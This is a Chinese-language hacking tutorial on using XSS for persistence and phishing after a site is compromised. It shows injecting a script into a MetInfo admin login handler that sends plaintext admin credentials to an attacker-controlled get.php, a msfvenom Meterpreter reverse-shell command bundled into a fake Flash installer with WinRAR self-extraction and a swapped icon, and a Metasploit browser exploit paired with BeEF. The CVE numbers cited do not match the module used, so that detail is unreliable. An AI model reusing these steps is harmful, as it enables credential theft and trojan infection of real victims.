WEB攻防-通用漏洞—XSS跨站之权限维持、钓鱼
XSS后台植入Cookie&表单劫持
前提条件:已经取得了web权限,我们可以直接在代码中写入XSS语句
有人可能会奇怪,为什么取得了web权限还要写入XSS,是因为我们要对后台的权限进行长期的控制(权限维持),我们可以通过借助XSS盗取cookie,利用xss平台实时监控cookie等凭据进行权限维持,即使修改后台登录账号密码,我们也可以获得相关权限,同时不会被后门工具识别。
当我们进入到页面后,我们可以在xss平台上接收到相关的cookie信息,如下所示
但是,有时候我们窃取了cookie也不能实现成功登录,因为对方可能采取的不是cookie来进行身份鉴别,而是使用sessionid来实现身份鉴别,这时候即使你获取了cookie,也不能实现登录,这个时候我们就要想办法获取到其明文的账号和密码。
这里我们首先看看其将账号密码发送到哪个文件中,我们通过浏览器抓包可以发现,账号密码被送入login_check.php
中
我们先随便输入一个账号密码,查看提交的数据,如下所示
我们再次观察login_check.php
,可以发现login_check.php
通过$metinfo_admin_name
接收账号,通过$metinfo_admin_pass
接收密码,然后通过JavaScript语句进行账号密码的发送。
我们如何进行表单的劫持呢?我们首先可以通过JavaScript语句将账号密码发送到别的地方,通过构造<script src="http://www.xiaodi8.com/get.php?user="账号"&pass"密码""></script>
,紧接着我们写一个php文件实现接收账号密码
$up='<script src=http://127.0.0.1:8081/web/get.php?user='.$metinfo_admin_name.'&pass='.$metinfo_admin_pass.'></script>'; |
对应的get.php文件如下所示
|
当别人进行成功登录后,就会进入index.php文件中,而这个文件的代码被我们添加了JavaScript代码
<script src=http://127.0.0.1:8081/web/get.php?user='.$metinfo_admin_name.'&pass='.$metinfo_admin_pass.'></script> |
会自动将信息发送到我们对应的php下进行接收,进而实现表单劫持
flash钓鱼配合MSF
我们首先下载一个正常的flash,如下所示
我们再通过msf生成一个后门exe,相关代码如下所示
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.129 LPORT=1111 -f exe > flash.exe |
其中LHOST
为监听端ip地址,LPORT
为监听端口
我们将这个文件传输到我们的本机上来,记得关闭本机杀毒软件,因为我们没做免杀
我们把两个文件进行捆绑,我们这里通过WinRAR进行两个文件的捆绑,如下所示
记得先勾选再改名,不然不会是以exe的形式存在的,接着选择高级-自解压选项,添加自解压路径:C:\windows\temp
之后我们设置自解压后运行,如下所示
之后我们将模式设置为全部隐藏
之后我们成功创建自解压文件
接下来我们为了更逼真,我们决定将图标进行更换,这里我们使用资源编辑器Restorator2018_Full_1793_FIX
进行修改
我们紧接着将图片进行导出,如下所示
然后我们打开我们的flash_install.exe
,然后将刚刚的图标导入进去,并且删除其原来的图标,然后保存即可
但是不知道为什么,这里把图标替换了,但是没什么反应,但是确实已经被替换了,接下来我们利用一个视频链接,里面插入xss代码自动下载这个文件,就实现了和xss的互动,但是这里过于复杂,还需要进行钓鱼网页的制作,所以就不在此演示
接着我们开启监听,我们使用win7虚拟机作为受害靶机演示
msfconsole |
我们这里假设已经通过钓鱼软件下载到了相关文件,这里复制到虚拟机上来图标变了,可能是没刷新吧,我们这里直接运行
运行后我们可以发现,已经监听到了相关上钩主机
我们shell进行获取权限,如下所示
如果想要成功率更高一点,就需要我们学习免杀相关内容,防止杀毒软件识别病毒
XSS-浏览网马配合MSF上线
前置条件:目标使用带有漏洞的浏览器,为IE11,漏洞编号为CVE-2019-1367和CVE-2020-1380
use exploit/windows/browser/ms14_064_ole_code_execution |
运行之后会生成一个网址,只要地址一被访问就会被触发,但是只针对Windows7系统
我们可以通过xss让其上线beef,再通过beef自动跳转到我们构造的网马地址,其一访问就会上线
成功完成测试,总之对于xss的利用方式有很多,需要我们自己去发散思维,多多尝试即可。